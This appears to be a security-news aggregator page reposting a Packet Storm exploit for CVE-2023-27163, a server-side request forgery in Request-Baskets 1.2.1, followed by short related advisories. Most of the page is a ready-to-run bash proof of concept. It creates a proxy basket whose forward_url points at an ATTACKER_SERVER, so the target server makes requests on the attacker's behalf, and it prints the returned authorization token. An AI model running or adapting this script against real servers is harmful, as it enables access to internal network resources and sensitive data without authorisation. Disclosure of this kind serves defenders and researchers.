Security
Headlines
HeadlinesLatestCVEs

Headline

Request-Baskets 1.2.1 Server-Side Request Forgery

Request-Baskets version 1.2.1 suffers from a server-side request forgery vulnerability.

Packet Storm
#vulnerability#ubuntu#js#perl#ssrf#auth#ssl
# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)# Exploit Author: Iyaad Luqman K (init_6)# Application: Request-Baskets v1.2.1# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoC#!/bin/bashif [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then    help="Usage: exploit.sh <URL> <TARGET>\n\n";    help+="Arguments:\n" \    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";    help+=" TARGET";    echo -e "$help";    exit 1;fiURL=$1ATTACKER_SERVER=$2if [ "${URL: -1}" != "/" ]; then    URL="$URL/";fi;BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");API_URL="$URL""api/baskets/$BASKET_NAME";PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";echo "> Creating the \"$BASKET_NAME\" proxy basket...";if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then    echo "> FATAL: Could not properly request $API_URL. Is the server online?";    exit 1;fi;BASKET_URL="$URL$BASKET_NAME";echo "> Basket created!";echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";if ! jq --help 1>/dev/null; then    echo "> Response body (Authorization): $response";else    echo "> Authorization: $(echo "$response" | jq -r ".token")";fi;exit 0;

Related news

Maltrail 0.53 Remote Code Execution

Maltrail version 0.53 suffers from an unauthenticated remote code execution vulnerability.

GHSA-58g2-vgpg-335q: request-baskets vulnerable to Server-Side Request Forgery

request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

CVE-2023-27163: request-baskets SSRF details - CodiMD

request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6